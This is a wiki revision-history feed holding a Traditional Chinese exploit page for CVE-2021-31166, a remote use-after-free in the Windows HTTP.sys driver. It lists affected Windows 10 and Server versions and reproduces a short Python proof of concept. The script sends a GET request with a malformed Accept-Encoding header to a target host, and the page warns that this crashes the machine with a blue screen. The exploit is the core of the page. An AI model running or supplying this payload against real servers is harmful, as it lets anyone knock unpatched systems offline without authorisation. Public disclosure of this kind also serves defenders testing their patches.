https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-31166_HTTP%E5%8D%94%E8%AD%B0%E6%A3%A7%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-tw
CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞/zh-tw - Revision history
2026-04-04T07:11:19Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-31166_HTTP%E5%8D%94%E8%AD%B0%E6%A3%A7%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&diff=5826&oldid=prev
Pwnwiki: Created page with "CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞"
2021-06-24T02:21:18Z
<p>Created page with "CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞"</p>
<p><b>New page</b></p><div><languages /><br />
==漏洞影響==<br />
<pre><br />
Windows Server, version 20H2 (Server Core Installation)<br />
Windows 10 Version 20H2 for ARM64-based Systems<br />
Windows 10 Version 20H2 for 32-bit Systems<br />
Windows 10 Version 20H2 for x64-based Systems<br />
Windows Server, version 2004 (Server Core installation)<br />
Windows 10 Version 2004 for x64-based Systems<br />
Windows 10 Version 2004 for ARM64-based Systems<br />
Windows 10 Version 2004 for 32-bit Systems<br />
</pre><br />
<br />
==POC==<br />
⚠️️執行該POC會出現藍屏。<br />
<pre><br />
# Axel '0vercl0k' Souchet - May 16 2021<br />
import requests<br />
import argparse<br />
<br />
def main():<br />
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')<br />
parser.add_argument('--target', required = True)<br />
args = parser.parse_args()<br />
r = requests.get(f'http://{args.target}/', headers = {<br />
'Accept-Encoding': 'doar-e, ftw, imo, ,',<br />
})<br />
print(r)<br />
<br />
main()<br />
</pre><br />
<br />
==GIF==<br />
[[File:windows.gif |500px]]<br />
<br />
<br />
==參考==<br />
https://github.com/0vercl0k/CVE-2021-31166</div>
Pwnwiki